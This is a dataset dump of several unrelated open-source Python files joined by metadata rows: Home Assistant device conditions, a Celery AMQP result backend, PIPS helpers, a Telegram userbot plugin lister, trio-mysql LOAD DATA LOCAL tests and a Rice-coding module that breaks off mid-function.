    DEVICE_CLASS_VIBRATION: [
        {CONF_TYPE: CONF_IS_VIBRATION},
        {CONF_TYPE: CONF_IS_NO_VIBRATION},
    ],
    DEVICE_CLASS_WINDOW: [{CONF_TYPE: CONF_IS_OPEN}, {CONF_TYPE: CONF_IS_NOT_OPEN}],
    DEVICE_CLASS_NONE: [{CONF_TYPE: CONF_IS_ON}, {CONF_TYPE: CONF_IS_OFF}],
}

# Voluptuous schema validating a device-condition config entry.
CONDITION_SCHEMA = cv.DEVICE_CONDITION_BASE_SCHEMA.extend(
    {
        vol.Required(CONF_ENTITY_ID): cv.entity_id,
        vol.Required(CONF_TYPE): vol.In(IS_OFF + IS_ON),
        vol.Optional(CONF_FOR): cv.positive_time_period_dict,
    }
)
async def async_get_conditions(
    hass: HomeAssistant, device_id: str
) -> list[dict[str, str]]:
    """List device conditions for every binary sensor entity of a device."""
    registry = await async_get_registry(hass)
    conditions: list[dict[str, str]] = []
    for entry in async_entries_for_device(registry, device_id):
        if entry.domain != DOMAIN:
            continue
        device_class = get_device_class(hass, entry.entity_id) or DEVICE_CLASS_NONE
        templates = ENTITY_CONDITIONS.get(
            device_class, ENTITY_CONDITIONS[DEVICE_CLASS_NONE]
        )
        for template in templates:
            conditions.append(
                {
                    **template,
                    "condition": "device",
                    "device_id": device_id,
                    "entity_id": entry.entity_id,
                    "domain": DOMAIN,
                }
            )
    return conditions
@callback
def async_condition_from_config(
    config: ConfigType, config_validation: bool
) -> condition.ConditionCheckerType:
    """Evaluate state based on configuration."""
    if config_validation:
        config = CONDITION_SCHEMA(config)
    # The condition type determines which binary state we must match.
    stat = "on" if config[CONF_TYPE] in IS_ON else "off"
    state_config = {
        condition.CONF_CONDITION: "state",
        condition.CONF_ENTITY_ID: config[CONF_ENTITY_ID],
        condition.CONF_STATE: stat,
    }
    if CONF_FOR in config:
        state_config[CONF_FOR] = config[CONF_FOR]
    return condition.state_from_config(state_config)
async def async_get_condition_capabilities(hass: HomeAssistant, config: dict) -> dict:
    """List condition capabilities."""
    extra = vol.Schema({vol.Optional(CONF_FOR): cv.positive_time_period_dict})
    return {"extra_fields": extra}
| 30.437037 | 88 | 0.721952 |
5b13b5f95b382d50806855ba8bf46c5793876164 | 9,697 | py | Python | vendor-local/lib/python/celery/backends/amqp.py | Mozilla-GitHub-Standards/54c69db06ef83bda60e995a6c34ecfd168ca028994e40ce817295415bb409f0c | f80e7c0cff97a1e9b301aa04015db983c7645778 | [
"BSD-3-Clause"
] | 4 | 2015-05-08T16:58:53.000Z | 2019-09-06T05:30:59.000Z | vendor-local/lib/python/celery/backends/amqp.py | Mozilla-GitHub-Standards/54c69db06ef83bda60e995a6c34ecfd168ca028994e40ce817295415bb409f0c | f80e7c0cff97a1e9b301aa04015db983c7645778 | [
"BSD-3-Clause"
] | 2 | 2019-02-17T17:44:53.000Z | 2019-03-28T03:54:39.000Z | vendor-local/lib/python/celery/backends/amqp.py | Mozilla-GitHub-Standards/54c69db06ef83bda60e995a6c34ecfd168ca028994e40ce817295415bb409f0c | f80e7c0cff97a1e9b301aa04015db983c7645778 | [
"BSD-3-Clause"
] | 7 | 2015-05-21T15:38:29.000Z | 2019-10-28T23:39:06.000Z | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import with_statement
import socket
import threading
import time
from itertools import count
from kombu.entity import Exchange, Queue
from kombu.messaging import Consumer, Producer
from .. import states
from ..exceptions import TimeoutError
from .base import BaseDictBackend
class BacklogLimitExceeded(Exception):
    """Raised when a result queue holds more state messages than the
    backlog limit allows the poller to fast-forward through."""
def repair_uuid(s):
    """Re-insert the dashes of a UUID whose dashes were stripped.

    AMQ entity names historically store UUIDs without dashes (for no
    known reason); this restores the canonical 8-4-4-4-12 grouping.
    """
    parts = (s[:8], s[8:12], s[12:16], s[16:20], s[20:])
    return "-".join(parts)
class AMQPBackend(BaseDictBackend):
    """Publishes results by sending messages.

    Each task result is published to its own binding named after the
    task id (dashes stripped); readers fast-forward through the queued
    state messages to find the most recent one.

    NOTE: this module targets Python 2 (``dict.values()[0]`` and
    ``iteritems`` below are Python-2-only idioms).
    """
    Exchange = Exchange
    Queue = Queue
    Consumer = Consumer
    Producer = Producer
    BacklogLimitExceeded = BacklogLimitExceeded
    # Results are awaited via drain_events rather than a polling loop.
    supports_native_join = True
    def __init__(self, connection=None, exchange=None, exchange_type=None,
                 persistent=None, serializer=None, auto_delete=True,
                 **kwargs):
        super(AMQPBackend, self).__init__(**kwargs)
        conf = self.app.conf
        self._connection = connection
        self.queue_arguments = {}
        # Fall back to app configuration when not given explicitly.
        self.persistent = (conf.CELERY_RESULT_PERSISTENT if persistent is None
                           else persistent)
        # NOTE(review): this uses the raw ``persistent`` argument, not
        # self.persistent, so delivery mode stays "transient" when
        # persistence comes only from the app config -- confirm intended.
        delivery_mode = persistent and "persistent" or "transient"
        exchange = exchange or conf.CELERY_RESULT_EXCHANGE
        exchange_type = exchange_type or conf.CELERY_RESULT_EXCHANGE_TYPE
        self.exchange = self.Exchange(name=exchange,
                                      type=exchange_type,
                                      delivery_mode=delivery_mode,
                                      durable=self.persistent,
                                      auto_delete=False)
        self.serializer = serializer or conf.CELERY_RESULT_SERIALIZER
        self.auto_delete = auto_delete
        # AMQP_TASK_RESULT_EXPIRES setting is deprecated and will be
        # removed in version 3.0.
        dexpires = conf.CELERY_AMQP_TASK_RESULT_EXPIRES
        self.expires = None
        if "expires" in kwargs:
            if kwargs["expires"] is not None:
                self.expires = self.prepare_expires(kwargs["expires"])
        else:
            self.expires = self.prepare_expires(dexpires)
        if self.expires:
            # Broker-side queue TTL; x-expires is in milliseconds.
            self.queue_arguments["x-expires"] = int(self.expires * 1000)
        self.mutex = threading.Lock()
    def _create_binding(self, task_id):
        # One queue per task, named after the dash-less task id.
        name = task_id.replace("-", "")
        return self.Queue(name=name,
                          exchange=self.exchange,
                          routing_key=name,
                          durable=self.persistent,
                          auto_delete=self.auto_delete,
                          queue_arguments=self.queue_arguments)
    def _create_producer(self, task_id, connection):
        # Declare the queue first so a publish never goes unrouted.
        self._create_binding(task_id)(connection.default_channel).declare()
        return self.Producer(connection, exchange=self.exchange,
                             routing_key=task_id.replace("-", ""),
                             serializer=self.serializer)
    def _create_consumer(self, bindings, channel):
        # no_ack: state messages are throwaway once consumed.
        return self.Consumer(channel, bindings, no_ack=True)
    def _publish_result(self, connection, task_id, meta):
        # cache single channel
        self._create_producer(task_id, connection).publish(meta)
    def revive(self, channel):
        # Nothing to revive; producers are created per publish.
        pass
    def _store_result(self, task_id, result, status, traceback=None,
                      max_retries=20, interval_start=0, interval_step=1,
                      interval_max=1):
        """Send task return value and status."""
        with self.mutex:
            with self.app.pool.acquire(block=True) as conn:
                def errback(error, delay):
                    print("Couldn't send result for %r: %r. Retry in %rs." % (
                        task_id, error, delay))
                # conn.ensure retries the publish on connection errors.
                send = conn.ensure(self, self._publish_result,
                                   max_retries=max_retries,
                                   errback=errback,
                                   interval_start=interval_start,
                                   interval_step=interval_step,
                                   interval_max=interval_max)
                send(conn, task_id, {"task_id": task_id, "status": status,
                                     "result": self.encode_result(result, status),
                                     "traceback": traceback})
        return result
    def get_task_meta(self, task_id, cache=True):
        # Always polls the broker; ``cache`` is accepted for API
        # compatibility but not consulted here.
        return self.poll(task_id)
    def wait_for(self, task_id, timeout=None, cache=True, propagate=True,
                 **kwargs):
        # Serve ready results from the local cache when allowed.
        cached_meta = self._cache.get(task_id)
        if cache and cached_meta and \
                cached_meta["status"] in states.READY_STATES:
            meta = cached_meta
        else:
            try:
                meta = self.consume(task_id, timeout=timeout)
            except socket.timeout:
                raise TimeoutError("The operation timed out.")
        state = meta["status"]
        if state == states.SUCCESS:
            return meta["result"]
        elif state in states.PROPAGATE_STATES:
            if propagate:
                raise self.exception_to_python(meta["result"])
            return meta["result"]
        else:
            # Not ready yet -- recurse until a final state arrives.
            return self.wait_for(task_id, timeout, cache)
    def poll(self, task_id, backlog_limit=100):
        """Fetch the latest state message for ``task_id`` (non-blocking)."""
        with self.app.pool.acquire_channel(block=True) as (_, channel):
            binding = self._create_binding(task_id)(channel)
            binding.declare()
            latest, acc = None, None
            for i in count():  # fast-forward
                # Drain queued messages; ``latest`` trails one behind so it
                # holds the last non-empty get when the queue runs dry.
                latest, acc = acc, binding.get(no_ack=True)
                if not acc:
                    break
                if i > backlog_limit:
                    raise self.BacklogLimitExceeded(task_id)
            if latest:
                payload = self._cache[task_id] = latest.payload
                return payload
            elif task_id in self._cache:  # use previously received state.
                return self._cache[task_id]
            return {"status": states.PENDING, "result": None}
    def drain_events(self, connection, consumer, timeout=None, now=time.time):
        """Block until at least one ready-state result arrives."""
        wait = connection.drain_events
        results = {}
        def callback(meta, message):
            # Only ready states count; the task id is recovered from the
            # routing key (dash-less uuid).
            if meta["status"] in states.READY_STATES:
                uuid = repair_uuid(message.delivery_info["routing_key"])
                results[uuid] = meta
        consumer.callbacks[:] = [callback]
        time_start = now()
        while 1:
            # Total time spent may exceed a single call to wait()
            if timeout and now() - time_start >= timeout:
                raise socket.timeout()
            wait(timeout=timeout)
            if results:  # got event on the wanted channel.
                break
        self._cache.update(results)
        return results
    def consume(self, task_id, timeout=None):
        """Block until the result for ``task_id`` is ready and return it."""
        with self.app.pool.acquire_channel(block=True) as (conn, channel):
            binding = self._create_binding(task_id)
            with self._create_consumer(binding, channel) as consumer:
                # Python 2 only: dict.values() indexing.
                return self.drain_events(conn, consumer, timeout).values()[0]
    def get_many(self, task_ids, timeout=None, **kwargs):
        """Yield ``(task_id, meta)`` pairs as each result becomes ready."""
        with self.app.pool.acquire_channel(block=True) as (conn, channel):
            ids = set(task_ids)
            cached_ids = set()
            # First serve whatever is already ready in the local cache.
            for task_id in ids:
                try:
                    cached = self._cache[task_id]
                except KeyError:
                    pass
                else:
                    if cached["status"] in states.READY_STATES:
                        yield task_id, cached
                        cached_ids.add(task_id)
            ids ^= cached_ids
            bindings = [self._create_binding(task_id) for task_id in task_ids]
            with self._create_consumer(bindings, channel) as consumer:
                while ids:
                    r = self.drain_events(conn, consumer, timeout)
                    ids ^= set(r)
                    for ready_id, ready_meta in r.iteritems():
                        yield ready_id, ready_meta
    def reload_task_result(self, task_id):
        raise NotImplementedError(
            "reload_task_result is not supported by this backend.")
    def reload_taskset_result(self, task_id):
        """Reload taskset result, even if it has been previously fetched."""
        raise NotImplementedError(
            "reload_taskset_result is not supported by this backend.")
    def save_taskset(self, taskset_id, result):
        raise NotImplementedError(
            "save_taskset is not supported by this backend.")
    def restore_taskset(self, taskset_id, cache=True):
        raise NotImplementedError(
            "restore_taskset is not supported by this backend.")
    def delete_taskset(self, taskset_id):
        raise NotImplementedError(
            "delete_taskset is not supported by this backend.")
    def __reduce__(self, args=(), kwargs={}):
        # Rebuild with the same configuration on unpickling.
        kwargs.update(
            dict(connection=self._connection,
                 exchange=self.exchange.name,
                 exchange_type=self.exchange.type,
                 persistent=self.persistent,
                 serializer=self.serializer,
                 auto_delete=self.auto_delete,
                 expires=self.expires))
        return super(AMQPBackend, self).__reduce__(args, kwargs)
| 38.943775 | 78 | 0.583892 |
64c2f9e7dcfa819a142cbc7aa01a03320823ce1e | 160 | py | Python | demos/__init__.py | droidadroit/nasbot | f8d5d0ba8b77c37ebaa6cd2ab148a2633ff20207 | [
"MIT"
] | null | null | null | demos/__init__.py | droidadroit/nasbot | f8d5d0ba8b77c37ebaa6cd2ab148a2633ff20207 | [
"MIT"
] | null | null | null | demos/__init__.py | droidadroit/nasbot | f8d5d0ba8b77c37ebaa6cd2ab148a2633ff20207 | [
"MIT"
] | null | null | null | """
Library for Bayesian Optimisation of NN Architectures.
Some demos for architecture search on synthetic and real problems.
-- kandasamy@cs.cmu.edu
""" | 32 | 68 | 0.75 |
921363bbf833f47c167f4dc774346b19052d3b4a | 3,627 | py | Python | packages/PIPS/pips/src/Passes/pyps/pypsex.py | DVSR1966/par4all | 86b33ca9da736e832b568c5637a2381f360f1996 | [
"MIT"
] | 51 | 2015-01-31T01:51:39.000Z | 2022-02-18T02:01:50.000Z | packages/PIPS/pips/src/Passes/pyps/pypsex.py | DVSR1966/par4all | 86b33ca9da736e832b568c5637a2381f360f1996 | [
"MIT"
] | 7 | 2017-05-29T09:29:00.000Z | 2019-03-11T16:01:39.000Z | packages/PIPS/pips/src/Passes/pyps/pypsex.py | DVSR1966/par4all | 86b33ca9da736e832b568c5637a2381f360f1996 | [
"MIT"
] | 12 | 2015-03-26T08:05:38.000Z | 2022-02-18T02:01:51.000Z | # -*- coding: utf-8 -*-
"""
Transformation - specific methods must be placed there.
For instance to enforce a property value, an activate etc before calling a pass
"""
from subprocess import Popen, PIPE
import pyps
import sys, os
def dump_chains_or_dg(module,which="whole_dependence"):
"""dump textual module's dependence graph or atomic chains, "which" parameter
specify which "flavor" you want, for instance "chains" or "effective_dependence"
(default is whole_dependence)"""
generator_name = "print_"+which+"_graph"
generator = getattr(module,generator_name)
if generator == None:
return "Sorry, " + generator_name + " is undefined !"
generator()
filename = os.path.join(module.workspace.dirname,module.show("DG_FILE"))
read_data = "An error occured"
with open(filename, 'r') as f:
read_data = f.read()
print "// " + which + " for " + module.name
print read_data
pyps.module.dump_chains_or_dg=dump_chains_or_dg
def dump_chains_or_dg(self, which="whole_dependence"):
    """Dump the chosen dependence-graph flavor for every contained module."""
    for member in self:
        member.dump_chains_or_dg(which=which)
pyps.modules.dump_chains_or_dg=dump_chains_or_dg
def view_chains_or_dg(module,format="png"):
    """Render the module's dependence graph or atomic chains with graphviz.

    The previously generated dot file is rendered to
    ``<module name>.<format>``; returns ``(output_file, dot_stdout,
    dot_stderr)``.  Not intended to be called directly: use view_dg or
    view_chains, which run the dot-producing pass first.
    """
    of=module.name+"."+format
    dot_cmd = ["dot","-T"+format, os.path.join(module.workspace.dirname,module.show("DOTDG_FILE")),"-o"+of]
    if module.workspace.verbose:
        print >> sys.stderr , "Generating image with", dot_cmd
    p = Popen(dot_cmd, stdout = PIPE, stderr = PIPE)
    (out,err) = p.communicate()
    if p.returncode !=0:
        print >> sys.stderr, err
        # BUG FIX: this previously referenced an undefined name ``ret``,
        # raising NameError instead of the intended RuntimeError.
        raise RuntimeError("%s failed with return code %d" % (dot_cmd, p.returncode))
    return (of,out,err)
pyps.module.view_chains_or_dg=view_chains_or_dg
def view_dg(module,format="png"):
    """Render the module's dependence graph in the given image ``format``."""
    # Produce the dot file, then hand off to the shared renderer.
    module.print_dot_dependence_graph()
    return module.view_chains_or_dg(format=format)
pyps.module.view_dg=view_dg
def view_chains(module,format="png"):
    """Render the module's atomic chains graph in the given image ``format``."""
    # Produce the chains dot file, then hand off to the shared renderer.
    module.print_dot_chains_graph()
    return module.view_chains_or_dg(format=format)
pyps.module.view_chains=view_chains
def loop_distribution(module,**kwargs):
    """Distribute loops: parallelize all dependences, then internalize."""
    module.rice_all_dependence(**kwargs)
    module.internalize_parallel_code(**kwargs)
pyps.module.loop_distribution=loop_distribution
def improve_locality(module,**kwargs):
    """Improve data locality via nest parallelization + internalization."""
    module.nest_parallelization(**kwargs)
    module.internalize_parallel_code(**kwargs)
pyps.module.improve_locality=improve_locality
# Keep a reference to the original pass so the wrapper can delegate to it.
_simdizer_auto_tile=pyps.loop.simdizer_auto_tile
def simdizer_auto_tile(loop,**kwargs):
    """Wrap simdizer_auto_tile: split update operators first."""
    loop.module.split_update_operator(**kwargs)
    _simdizer_auto_tile(loop,**kwargs)
pyps.loop.simdizer_auto_tile=simdizer_auto_tile
# Keep a reference to the original pass so the wrapper can delegate to it.
_simdizer=pyps.module.simdizer
def simdizer(module,**kwargs):
    """Wrap simdizer: activate the region-based analyses it depends on."""
    module._ws.activate(module.must_regions)
    module._ws.activate(module.region_chains)
    module._ws.activate(module.rice_regions_dependence_graph)
    _simdizer(module,**kwargs)
pyps.module.simdizer=simdizer
# Unfolding, pyps way ! :-)
def unfold(module,**kwargs):
    """Recursively inline every non-stub callee into ``module``."""
    while module.callees:
        # Keep inlining as long as at least one callee could be inlined;
        # stubs are never inlined, so stop once only stubs remain.
        progressed = False
        for callee in module.callees:
            if callee.stub_p:
                continue
            callee.inlining(callers=module.name)
            progressed = True
        if not progressed:
            break
pyps.module.unfold = unfold
def unfold(modules,**kwargs):
    """Unfold (fully inline) every module in the collection."""
    for member in modules:
        member.unfold()
pyps.modules.unfold = unfold
d82f075cc5c3ab6d09796da196792d7c8fcce0ed | 500 | py | Python | tracking/__init__.py | mjschultz/django-tracking2 | 19679bd16b94e1cc4c9d5bd1abcc01e55dcac49c | [
"BSD-2-Clause"
] | null | null | null | tracking/__init__.py | mjschultz/django-tracking2 | 19679bd16b94e1cc4c9d5bd1abcc01e55dcac49c | [
"BSD-2-Clause"
] | null | null | null | tracking/__init__.py | mjschultz/django-tracking2 | 19679bd16b94e1cc4c9d5bd1abcc01e55dcac49c | [
"BSD-2-Clause"
] | null | null | null | __version_info__ = {
'major': 0,
'minor': 2,
'micro': 2,
'releaselevel': 'beta',
'serial': 1
}
def get_version(short=False):
assert __version_info__['releaselevel'] in ('alpha', 'beta', 'final')
vers = ["%(major)i.%(minor)i.%(micro)i" % __version_info__]
if __version_info__['releaselevel'] != 'final' and not short:
vers.append('%s%i' % (__version_info__['releaselevel'][0], __version_info__['serial']))
return ''.join(vers)
__version__ = get_version()
| 29.411765 | 95 | 0.628 |
3042e205e0ae2ab6624b2ab539924832d8290dff | 1,268 | py | Python | userbot/plugins/command_list.py | staxx1/TurhanUser | 555e7e7a781104981b92e33bb9ad583b062bc14d | [
"MIT"
] | 5 | 2020-08-17T08:05:53.000Z | 2020-09-11T18:27:41.000Z | userbot/plugins/command_list.py | staxx1/TurhanUser | 555e7e7a781104981b92e33bb9ad583b062bc14d | [
"MIT"
] | null | null | null | userbot/plugins/command_list.py | staxx1/TurhanUser | 555e7e7a781104981b92e33bb9ad583b062bc14d | [
"MIT"
] | null | null | null | # Join @TeleBotHelp for custom plugins
import asyncio
import requests
from telebot import CMD_HELP
@telebot.on(admin_cmd(pattern="cmds", outgoing=True))
@telebot.on(sudo_cmd(pattern="cmds", allow_sudo=True))
async def install(event):
    """List every plugin file shipped with the bot and post it to del.dog."""
    if event.fwd_from:
        return
    tele = await eor(event, "`Searching for all plugins...`")
    # ``ls`` already emits one plugin file name per line.
    cmd = "ls telebot/plugins"
    process = await asyncio.create_subprocess_shell(
        cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
    )
    stdout, stderr = await process.communicate()
    o = stdout.decode()
    # FIX: the previous code used a redundant chained self-assignment
    # (``OUTPUT = (OUTPUT) = ...``) and a no-op split/join on ``o``.
    OUTPUT = f"Here is the list of plugins found in 'master' branch of TeleBot.\n{o}\n\nUse .help <cmd_name> to learn how a paticular plugin works.\nConsider joining @Turhanuserbott for help!"
    await tele.edit("`Plugins extracted, pasting it...`")
    message = OUTPUT
    # Publish the plugin list as a del.dog paste and link to it.
    url = "https://del.dog/documents"
    r = requests.post(url, data=message.encode("UTF-8")).json()
    url = f"https://del.dog/{r['key']}"
    await tele.edit(
        f"`All plugins available in` **TeleBot** `can be found` [here]({url})!!"
    )
# Register the .cmds command in the bot's help index.
CMD_HELP.update(
    {"command_list": ".cmds\nUse - Get the list of all plugins in the bot."}
)
| 31.7 | 187 | 0.659306 |
a07ccc3bff18963555bcbce7a4ce890c41c33d7e | 3,898 | py | Python | tests/test_load_local.py | mhumpula/trio-mysql | a892bf128056cae7668437842aece74d9a0eb8dd | [
"MIT"
] | null | null | null | tests/test_load_local.py | mhumpula/trio-mysql | a892bf128056cae7668437842aece74d9a0eb8dd | [
"MIT"
] | null | null | null | tests/test_load_local.py | mhumpula/trio-mysql | a892bf128056cae7668437842aece74d9a0eb8dd | [
"MIT"
] | null | null | null | import pytest
from trio_mysql import cursors, OperationalError, Warning
from tests import base
import os
import warnings
__all__ = ["TestLoadLocal"]
class TestLoadLocal(base.TrioMySQLTestCase):
    """Tests for MySQL's LOAD DATA LOCAL INFILE via trio_mysql.

    NOTE(review): the quoted strings right after ``await set_me_up(self)``
    in each test are expression statements, not docstrings (they do not
    come first in the function body); left in place to keep code identical.
    """
    @pytest.mark.trio
    async def test_no_file(self, set_me_up):
        await set_me_up(self)
        """Test load local infile when the file does not exist"""
        conn = await self.connect()
        c = conn.cursor()
        await c.execute("CREATE TABLE test_load_local (a INTEGER, b INTEGER)")
        try:
            # A missing local file must surface as OperationalError.
            with self.assertRaises(OperationalError):
                await c.execute ("LOAD DATA LOCAL INFILE 'no_data.txt' INTO TABLE "
                                 "test_load_local fields terminated by ','")
        finally:
            await c.execute("DROP TABLE test_load_local")
            await c.aclose()
    @pytest.mark.trio
    async def test_load_file(self, set_me_up):
        await set_me_up(self)
        """Test load local infile with a valid file"""
        conn = await self.connect()
        c = conn.cursor()
        await c.execute("CREATE TABLE test_load_local (a INTEGER, b INTEGER)")
        # Fixture file lives next to the tests, under data/.
        filename = os.path.join(os.path.dirname(os.path.realpath(__file__)),
                                'data',
                                'load_local_data.txt')
        try:
            await c.execute(
                ("LOAD DATA LOCAL INFILE '{0}' INTO TABLE " +
                 "test_load_local FIELDS TERMINATED BY ','").format(filename)
            )
            await c.execute("SELECT COUNT(*) FROM test_load_local")
            # The fixture contains exactly 22749 rows.
            self.assertEqual(22749, (await c.fetchone())[0])
        finally:
            await c.execute("DROP TABLE test_load_local")
    @pytest.mark.trio
    async def test_unbuffered_load_file(self, set_me_up):
        await set_me_up(self)
        """Test unbuffered load local infile with a valid file"""
        conn = await self.connect()
        # SSCursor streams rows instead of buffering the full result set.
        c = conn.cursor(cursors.SSCursor)
        await c.execute("CREATE TABLE test_load_local (a INTEGER, b INTEGER)")
        filename = os.path.join(os.path.dirname(os.path.realpath(__file__)),
                                'data',
                                'load_local_data.txt')
        try:
            await c.execute(
                ("LOAD DATA LOCAL INFILE '{0}' INTO TABLE " +
                 "test_load_local FIELDS TERMINATED BY ','").format(filename)
            )
            await c.execute("SELECT COUNT(*) FROM test_load_local")
            self.assertEqual(22749, (await c.fetchone())[0])
        finally:
            # Reconnect before dropping: the SS cursor may still hold the
            # connection's result stream.
            await c.aclose()
            await conn.aclose()
            await conn.connect()
            c = conn.cursor()
            await c.execute("DROP TABLE test_load_local")
    @pytest.mark.trio
    async def test_load_warnings(self, set_me_up):
        await set_me_up(self)
        """Test load local infile produces the appropriate warnings"""
        conn = await self.connect()
        c = conn.cursor()
        await c.execute("CREATE TABLE test_load_local (a INTEGER, b INTEGER)")
        # This fixture contains a malformed integer to trigger a warning.
        filename = os.path.join(os.path.dirname(os.path.realpath(__file__)),
                                'data',
                                'load_local_warn_data.txt')
        try:
            with warnings.catch_warnings(record=True) as w:
                warnings.simplefilter('always')
                await c.execute(
                    ("LOAD DATA LOCAL INFILE '{0}' INTO TABLE " +
                     "test_load_local FIELDS TERMINATED BY ','").format(filename)
                )
                self.assertEqual(w[0].category, Warning)
                expected_message = "Incorrect integer value"
                if expected_message not in str(w[-1].message):
                    self.fail("%r not in %r" % (expected_message, w[-1].message))
        finally:
            await c.execute("DROP TABLE test_load_local")
            await c.aclose()
| 40.185567 | 83 | 0.568753 |
ca83080ce6d2d03fa1bf32afa8276321697f6b0a | 6,378 | py | Python | hypatia/text/ricecode.py | pfw/hypatia | 407cd62e4817c85188aa6abdf204c5aaff5ab570 | [
"ZPL-2.1"
] | null | null | null | hypatia/text/ricecode.py | pfw/hypatia | 407cd62e4817c85188aa6abdf204c5aaff5ab570 | [
"ZPL-2.1"
] | null | null | null | hypatia/text/ricecode.py | pfw/hypatia | 407cd62e4817c85188aa6abdf204c5aaff5ab570 | [
"ZPL-2.1"
] | null | null | null | ##############################################################################
#
# Copyright (c) 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Rice coding (a variation of Golomb coding)
Based on a Java implementation by Glen McCluskey described in a Usenix
;login: article at
http://www.usenix.org/publications/login/2000-4/features/java.html
McCluskey's article explains the approach as follows. The encoding
for a value x is represented as a unary part and a binary part. The
unary part is a sequence of 1 bits followed by a 0 bit. The binary
part encodes some of the lower bits of x-1.
The encoding is parameterized by a value m that describes how many
bits to store in the binary part. If most of the values are smaller
than 2**m then they can be stored in only m+1 bits.
Compute the length of the unary part, q, where
q = math.floor((x-1)/ 2 ** m)
Emit q 1 bits followed by a 0 bit.
Emit the lower m bits of x-1, treating x-1 as a binary value.
"""
import array
class BitArray(object):
    """Growable bit vector backed by an ``array('B')`` of bytes.

    Bit *i* lives at bit ``i % 8`` (LSB-first) of byte ``i // 8``.
    """

    def __init__(self, buf=None):
        # ``buf`` is kept for backward compatibility with existing callers
        # but has never been used; the array always starts empty.
        self.bytes = array.array("B")
        self.nbits = 0      # bits stored so far
        self.bitsleft = 0   # free bit slots remaining in the last byte
        self.tostring = self._bytes_accessor()

    def _bytes_accessor(self):
        # BUG FIX: array.array.tostring() was removed in Python 3.9;
        # prefer tobytes() (available since 3.2) and fall back for
        # ancient interpreters, keeping the public name ``tostring``.
        return getattr(self.bytes, "tobytes", None) or self.bytes.tostring

    def __getitem__(self, i):
        """Return bit *i* as 0 or 1."""
        byte, offset = divmod(i, 8)
        mask = 2 ** offset
        if self.bytes[byte] & mask:
            return 1
        else:
            return 0

    def __setitem__(self, i, val):
        """Set bit *i* to 1 if *val* is truthy, else clear it."""
        byte, offset = divmod(i, 8)
        mask = 2 ** offset
        if val:
            self.bytes[byte] |= mask
        else:
            self.bytes[byte] &= ~mask

    def __len__(self):
        return self.nbits

    def append(self, bit):
        """Append a 1 if *bit* is true or a 0 if it is false."""
        if self.bitsleft == 0:
            # Grow the backing store by one zeroed byte.
            self.bytes.append(0)
            self.bitsleft = 8
        self.__setitem__(self.nbits, bit)
        self.nbits += 1
        self.bitsleft -= 1

    def __getstate__(self):
        return self.nbits, self.bitsleft, self.tostring()

    def __setstate__(self, nbits_bitsleft_s):
        nbits, bitsleft, s = nbits_bitsleft_s
        self.bytes = array.array("B", s)
        self.nbits = nbits
        self.bitsleft = bitsleft
        # BUG FIX: the byte accessor was previously not restored after
        # unpickling, leaving instances without a working tostring().
        self.tostring = self._bytes_accessor()
class RiceCode(object):
    """Rice-coded list of positive integers.

    Each value x >= 1 is stored as a unary quotient (``(x-1) >> m`` one
    bits and a terminating zero) followed by the low ``m`` bits of
    ``x-1``, all packed into a BitArray.
    """
    def __init__(self, m):
        """Construct a RiceCode for m-bit values.

        NOTE(review): m == 0 passes this range check but init() then
        computes ``1 << (m - 1)`` == ``1 << -1``, which raises
        ValueError -- confirm whether m=0 should be rejected here.
        """
        if not (0 <= m <= 16):
            raise ValueError("m must be between 0 and 16")
        self.init(m)
        self.bits = BitArray()
        self.len = 0
    def init(self, m):
        # Precompute the mask of the low m bits and the top-bit probe
        # used when emitting the binary part.
        self.m = m
        self.lower = (1 << m) - 1
        self.mask = 1 << (m - 1)
    def append(self, val):
        """Append an item (must be >= 1) to the list."""
        if val < 1:
            raise ValueError("value >= 1 expected, got %s" % repr(val))
        val -= 1
        # emit the unary part of the code
        q = val >> self.m
        for i in range(q):
            self.bits.append(1)
        self.bits.append(0)
        # emit the binary part
        r = val & self.lower
        mask = self.mask
        while mask:
            self.bits.append(r & mask)
            mask >>= 1
        self.len += 1
    def __len__(self):
        return self.len
    def tolist(self):
        """Return the items as a list."""
        l = []
        i = 0 # bit offset
        binary_range = range(self.m)
        for j in range(self.len):
            # Count the unary 1-bits up to the terminating 0.
            unary = 0
            while self.bits[i] == 1:
                unary += 1
                i += 1
            assert self.bits[i] == 0
            i += 1
            # Reassemble the m-bit binary part, MSB first.
            binary = 0
            for k in binary_range:
                binary = (binary << 1) | self.bits[i]
                i += 1
            l.append((unary << self.m) + (binary + 1))
        return l
    def tostring(self):
        """Return a binary string containing the encoded data.

        The binary string may contain some extra zeros at the end.
        """
        return self.bits.tostring()
    def __getstate__(self):
        return self.m, self.bits
    def __setstate__(self, m_bits):
        m, bits = m_bits
        self.init(m)
        self.bits = bits
def encode(m, l):
    """Rice-encode the values in *l* using an m-bit binary part."""
    code = RiceCode(m)
    for value in l:
        code.append(value)
    # Sanity check: decoding must reproduce the input exactly.
    assert code.tolist() == l
    return code
def encode_deltas(l):
    """Encode a sequence as (first value, Rice-coded successive deltas).

    Because RiceCode.append requires values >= 1, every delta must be
    at least 1, i.e. *l* must be strictly increasing.

    NOTE(review): the single-element case returns a plain list ``[]``
    instead of a RiceCode, which has no tolist() method -- confirm how
    callers are expected to handle that asymmetry.
    """
    if len(l) == 1:
        return l[0], []
    deltas = RiceCode(6)
    deltas.append(l[1] - l[0])
    for i in range(2, len(l)):
        deltas.append(l[i] - l[i - 1])
    return l[0], deltas
def decode_deltas(start, enc_deltas):
    """Rebuild the original sequence from its first value and encoded deltas.

    Inverse of :func:`encode_deltas`: each delta is added to the running
    value, beginning at *start*.
    """
    deltas = enc_deltas.tolist()
    # BUG FIX: the previous implementation indexed deltas starting at 1
    # (skipping deltas[0]) and then reused deltas[-1] for the final
    # element, so it only round-tripped sequences whose deltas were all
    # equal (the consecutive-integer case the self-test exercises).
    # Accumulate every delta exactly once instead.
    result = [start]
    for delta in deltas:
        result.append(result[-1] + delta)
    return result
def _print(x, newline=True):
import sys
fmt = newline and "%s\n" or "%s"
sys.stdout.write(fmt % x)
def test():
